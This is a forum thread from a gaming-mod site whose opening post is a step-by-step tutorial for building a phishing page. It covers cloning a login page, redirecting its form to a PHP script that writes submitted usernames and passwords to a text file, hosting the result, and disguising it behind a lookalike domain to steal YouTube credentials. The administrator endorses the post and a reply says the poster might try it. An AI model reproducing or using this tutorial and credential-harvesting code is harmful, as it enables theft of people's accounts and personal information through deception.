UnthoughtofModz
UnthoughtofModz
UnthoughtofModz
Would you like to react to this message? Create an account in a few clicks or log in to continue.

UnthoughtofModz

We are a modding site, thriving for success
 
HomeHome  NewsNews  Latest imagesLatest images  RegisterRegister  Log inLog in  
Everyone that is new to the site be sure to post here an introduction. Also we do need to find new members, get that UoM spirit up and get some of your friends to a great and friendly new site.
IllusiveGaming.net78.net
Top posters
Josh
how to make a phishing site Vote_lcaphow to make a phishing site Voting_barhow to make a phishing site Vote_rcap 
Crank
how to make a phishing site Vote_lcaphow to make a phishing site Voting_barhow to make a phishing site Vote_rcap 
HDLobbies
how to make a phishing site Vote_lcaphow to make a phishing site Voting_barhow to make a phishing site Vote_rcap 
Teh Bird
how to make a phishing site Vote_lcaphow to make a phishing site Voting_barhow to make a phishing site Vote_rcap 
IMoD_GaMeRs
how to make a phishing site Vote_lcaphow to make a phishing site Voting_barhow to make a phishing site Vote_rcap 
The Game Forum
how to make a phishing site Vote_lcaphow to make a phishing site Voting_barhow to make a phishing site Vote_rcap 
Jaydot
how to make a phishing site Vote_lcaphow to make a phishing site Voting_barhow to make a phishing site Vote_rcap 
xJESUSxMODz
how to make a phishing site Vote_lcaphow to make a phishing site Voting_barhow to make a phishing site Vote_rcap 
-1337-
how to make a phishing site Vote_lcaphow to make a phishing site Voting_barhow to make a phishing site Vote_rcap 
Spongebob
how to make a phishing site Vote_lcaphow to make a phishing site Voting_barhow to make a phishing site Vote_rcap 
Latest topics
» Old Site Coming Back from the grave
how to make a phishing site EmptyMon May 21, 2012 12:22 pm by Crank

» Staff Application Form
how to make a phishing site EmptySat Mar 17, 2012 12:17 pm by Jaydot

» This is just sad
how to make a phishing site EmptySun Mar 11, 2012 1:41 pm by Jaydot

» Need Members
how to make a phishing site EmptyWed Feb 22, 2012 6:33 pm by Jaydot

» All USB Mods Updated Daily
how to make a phishing site EmptyTue Jan 17, 2012 8:13 pm by Crank

» New Site Theme
how to make a phishing site EmptyTue Jan 17, 2012 8:11 pm by Crank

» How to Become staff?
how to make a phishing site EmptyTue Jan 17, 2012 8:08 pm by Crank

» How to get a better K/D ratio
how to make a phishing site EmptyTue Jan 17, 2012 8:00 pm by xJESUSxMODz

» Capture Card | Info
how to make a phishing site EmptyTue Jan 17, 2012 7:03 pm by xJESUSxMODz

Who is online?
In total there is 1 user online :: 0 Registered, 0 Hidden and 1 Guest

None

Most users ever online was 154 on Sat Apr 10, 2021 10:52 am

 

 how to make a phishing site

Go down 
3 posters
AuthorMessage
a10thlobbyz
One Hit Wonder
One Hit Wonder



Posts : 1
Points : 3
Reputation : 0
Join date : 2011-03-26

how to make a phishing site Empty
PostSubject: how to make a phishing site   how to make a phishing site EmptySat Mar 26, 2011 8:52 pm

What is a phishing site?
A phishing site is a duplicate of another website that you sign in to. It would look exactly the same and act exactly the same
as the original site, but the information you log in with will be sent to the person who runs that site. So if I wanted to get people's
Youtube password, I would name the site something close to youtube.tk and make it look exactly like the youtube login page.
Then i would give someone the link and when they sign in, all the information that they typed will be sent to me. Example: youtue.tk.

step 1:
- Go to the login/registration page of a website you want to copy.
- Right click on a free space on the site and a drop down menu will display
- Click, view page source
- Copy and paste the page source in to notepad
how to make a phishing site Th_ojlk

step 2:
- Once the whole source is in notepad, scroll to the bottom and press Ctrl+F
- A find window will appear, type in Action and press enter
- It will move you to any place that has "Action"
- When ever you see action around something like this: action="https://www.website.com/something" method="post" replace the link in the quotes,
it would be website.com/something, with Post.php. So it would be: action="post.php" method="post"
- There can be more than one phrase like this, so after you change the link to post.php keep doing the find operation to find any others.
- Save this as index.htm and close it.how to make a phishing site Th_hi

step 3:
- Open a new notepad and paste this inside:


<?php
header ('Location: http://www.website.com/something');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
how to make a phishing site Th_ppp

Step 4:
- Go to www.badwaresite.www and sign up
- When you are signed into ripway, click "my files" and then click upload files. Upload index.htm first and then upload post.php
- When it is done uploading, go to my files and there should be a link inder index.htm
- That is the link to your phishing site, click it and see how it looks
- When people sign into/up for the website, any information that they enter will be displayed as a new text file when you sign back into ripway and go into my files
how to make a phishing site Th_kj

Step 5:
- go to dot.tk
- copy and paste your phishing url into where it says "enter your url here"
- When you do that, a page will appear guiding you to change the link to whatyouwant.tk and when people go there they will be going to your phishing website.
Back to top Go down
Crank
Site Administrator
Site Administrator
Crank


Posts : 54
Points : 10316
Reputation : 10071
Join date : 2010-12-11
Age : 28
Location : United States

how to make a phishing site Empty
PostSubject: Re: how to make a phishing site   how to make a phishing site EmptyMon May 02, 2011 11:39 pm

Post has permission from me! So DONT LOCK THIS!
Back to top Go down
http://www.unthoughtofmodz.com
xJESUSxMODz
UoM User-1
UoM User-1



Posts : 32
Points : 55
Reputation : 5
Join date : 2012-01-17
Age : 25
Location : Turn around and you will find out...

how to make a phishing site Empty
PostSubject: Re: how to make a phishing site   how to make a phishing site EmptyTue Jan 17, 2012 7:02 pm

nice, I might try this...
Back to top Go down
Sponsored content





how to make a phishing site Empty
PostSubject: Re: how to make a phishing site   how to make a phishing site Empty

Back to top Go down
 
how to make a phishing site
Back to top 
Page 1 of 1
 Similar topics
-
» How to make a golden gun match
» TuT - How to make your Firefox Browser faster. | Confirmed!
» Site has its own .Com
» Im New to this site
» New Site Theme

Permissions in this forum:You cannot reply to topics in this forum
UnthoughtofModz :: Computer Lounge :: Geek Squad Fixing Your Pc-
Jump to: